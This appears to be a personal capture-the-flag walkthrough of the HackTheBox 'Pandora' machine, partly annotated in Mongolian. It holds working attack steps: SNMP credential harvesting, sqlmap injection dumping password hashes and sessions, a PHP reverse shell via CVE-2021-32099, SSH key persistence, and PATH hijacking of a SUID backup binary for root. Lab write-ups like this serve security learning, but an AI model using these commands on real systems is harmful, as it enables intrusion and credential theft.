1. IP Address
# Machine Address
10.10.11.136
# Local Address
10.10.14.4
2. Nmap
nmap -sV -sC -oA nmap/pandora 10.10.11.136
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-20 23:41 EST
Nmap scan report for 10.10.11.136
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.71 seconds
nmap -vvv -p 22,80 -A -v -sC -sV -oN intial.nmap 10.10.11.136
# Nmap 7.91 scan initiated Sun Feb 20 23:44:42 2022 as: nmap -vvv -p 22, -A -v -sC -sV -oN nmap/intial.nmap 80 10.10.11.136
Nmap scan report for 80 (0.0.0.80) [host down, received no-response]
Nmap scan report for 10.10.11.136
Host is up, received syn-ack (0.24s latency).
Scanned at 2022-02-20 23:44:42 EST for 11s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPIYGoHvNFwTTboYexVGcZzbSLJQsxKopZqrHVTeF8oEIu0iqn7E5czwVkxRO/icqaDqM+AB3QQVcZSDaz//XoXsT/NzNIbb9SERrcK/n8n9or4IbXBEtXhRvltS8NABsOTuhiNo/2fdPYCVJ/HyF5YmbmtqUPols6F5y/MK2Yl3eLMOdQQeax4AWSKVAsR+issSZlN2rADIvpboV7YMoo3ktlHKz4hXlX6FWtfDN/ZyokDNNpgBbr7N8zJ87+QfmNuuGgmcZzxhnzJOzihBHIvdIM4oMm4IetfquYm1WKG3s5q70jMFrjp4wCyEVbxY+DcJ54xjqbaNHhVwiSWUZnAyWe4gQGziPdZH2ULY+n3iTze+8E4a6rxN3l38d1r4THoru88G56QESiy/jQ8m5+Ang77rSEaT3Fnr6rnAF5VG1+kiA36rMIwLabnxQbAWnApRX9CHBpMdBj7v8oLhCRn7ZEoPDcD1P2AASdaDJjRMuR52YPDlUSDd8TnI/DFFs=
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNNJGh4HcK3rlrsvCbu0kASt7NLMvAUwB51UnianAKyr9H0UBYZnOkVZhIjDea3F/CxfOQeqLpanqso/EqXcT9w=
| 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOCMYY9DMj/I+Rfosf+yMuevI7VFIeeQfZSxq67EGxsb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 20 23:44:53 2022 -- 2 IP addresses (1 host up) scanned in 11.32 seconds
sudo nmap -sU -top-ports=20 panda.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-21 00:03 EST
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.24s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp closed dhcps
68/udp closed dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open|filtered netbios-ns
138/udp closed netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 12.38 seconds
3. Snmpwalk
sudo apt-get install snmp
snmpwalk -v 1 -c public panda.htb > common.txt
-u daniel -p HotelBabylon23
SSH
ssh daniel@10.10.11.136
#id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
#sudo -l
Sorry, user daniel may not run sudo on pandora.
netstat -tunpn | grep LISTEN
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
4. Exploitation
Hosts
127.0.0.1 localhost.localdomain pandora.htb pandora.pandora.htb
127.0.1.1 pandora
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
curl
curl localhost.localdomain/pandora_console/
4.1 Port forwarding
port forwarding from vm machine:
ssh -D 9090 daniel@10.10.11.136
#or
ssh -i 80:localhost:80 daniel@panda.htb
local vm -s localhost.localdomain/pandora_console/
хандана.
proxychains
sudo vi /etc/proxychains.conf
#add
socks5 127.0.0.1 9090 daniel HotelBabylon23
#sqlmap
sudo proxychains sqlmap --url="http://localhost/pandora_console/include/chart_generator.php?session_id=''" -D pandora --tables
sudo proxychains sqlmap --url="http://localhost/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tpassword_history --dump
Database: pandora
Table: tpassword_history
[2 entries]
+---------+---------+---------------------+----------------------------------+---------------------+
| id_pass | id_user | date_end | password | date_begin |
+---------+---------+---------------------+----------------------------------+---------------------+
| 1 | matt | 0000-00-00 00:00:00 | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 |
| 2 | daniel | 0000-00-00 00:00:00 | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 |
+---------+---------+---------------------+----------------------------------+---------------------+
Session history:
sudo proxychains sqlmap --url="http://localhost/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump
| sdhjq94o4rhh2ae583881rk749 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; | 1645407015 |
энэ cookie session болохгүй байсан…
4.2 CVE-2021-32099
https://github.com/ibnuuby/CVE-2021-32099
admin tool -> file manager цэсээр ороод php reverse shell хуулна.
nc -lvnp 9001
# http://localhost/pandora_console/images/php_rev.php
# хандаад shell руу орно.
4.3 Shell balance
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo
f+g [enter enter]
буцаад nc орлоо
export TERM=xterm
user.txt
b56461f05*****
5. Enumeration
sudo -l
#
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin
find / -user root -perm -4000 -exec ls -ldb {} \; >/tmp/suidfiles
matt@pandora:/tmp$ ls
suidfiles
matt@pandora:/tmp$ cat suidfiles
-rwsr-xr-x 1 root root 166056 Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 31032 May 26 2021 /usr/bin/pkexec
-rwsr-xr-x 1 root root 85064 Jul 14 2021 /usr/bin/chfn
-rwsr-xr-x 1 root root 44784 Jul 14 2021 /usr/bin/newgrp
-rwsr-xr-x 1 root root 88464 Jul 14 2021 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39144 Jul 21 2020 /usr/bin/umount
-rwsr-x--- 1 root matt 16816 Dec 3 15:58 /usr/bin/pandora_backup
-rwsr-xr-x 1 root root 68208 Jul 14 2021 /usr/bin/passwd
-rwsr-xr-x 1 root root 55528 Jul 21 2020 /usr/bin/mount
-rwsr-xr-x 1 root root 67816 Jul 21 2020 /usr/bin/su
-rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 53040 Jul 14 2021 /usr/bin/chsh
-rwsr-xr-x 1 root root 473576 Jul 23 2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51344 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 22840 May 26 2021 /usr/lib/policykit-1/polkit-agent-helper-1
Backup UtilityNow attempting to backup PandoraFMS clienttar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora!07P@C=jpv=D"=== @ailed!
ssh
ssh-keygen -t rsa
# history
matt@pandora:/home/matt$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/matt/.ssh/id_rsa):
Created directory '/home/matt/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/matt/.ssh/id_rsa
Your public key has been saved in /home/matt/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:9zHdIiJsSlQFOaC9aL2Ps3CVHT4hS2hIfWnb0yS0zoo matt@pandora
The key's randomart image is:
+---[RSA 3072]----+
| ....o*o |
| . +.o* ... |
| o =oo+++ |
| = +.Ooo.. . |
| o + S O.+ o .|
| . . * + + + . |
| . E . . |
| o.o |
| oo. |
+----[SHA256]-----+
cd .ssh
cat id_rsa.pub > authorized_keys
# history
matt@pandora:/home/matt/.ssh$ ls
id_rsa id_rsa.pub
matt@pandora:/home/matt/.ssh$ cat id_rsa.pub > authorized_keys
matt@pandora:/home/matt/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
matt@pandora:/home/matt/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMWVpzp5*******************k= matt@pandora
matt@pandora:/home/matt/.ssh$
chmod 700 .ssh
cd .ssh
chmod 600 authorized_keys
Local vm руу id_rsa хуулна.
matt@pandora:/home/matt/.ssh$ python3 -m http.server 9001
Serving HTTP on 0.0.0.0 port 9001 (http://0.0.0.0:9001/) ...
10.10.14.6 - - [22/Feb/2022 06:28:54] "GET /id_rsa HTTP/1.1" 200 -
10.10.14.6 - - [22/Feb/2022 06:29:09] "GET /id_rsa HTTP/1.1" 200 -
# Local VM
└──╼ $curl 10.10.11.136:9001/id_rsa -o id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2602 100 2602 0 0 5172 0 --:--:-- --:--:-- --:--:-- 5235
# chmod
chmod 600 id_rsa
ssh -i id_rsa matt@10.10.11.136
matt ssh:
echo "/bin/bash" > tar
chmod +x tar
export PATH=$(pwd):$PATH
/usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root.txt
9087141********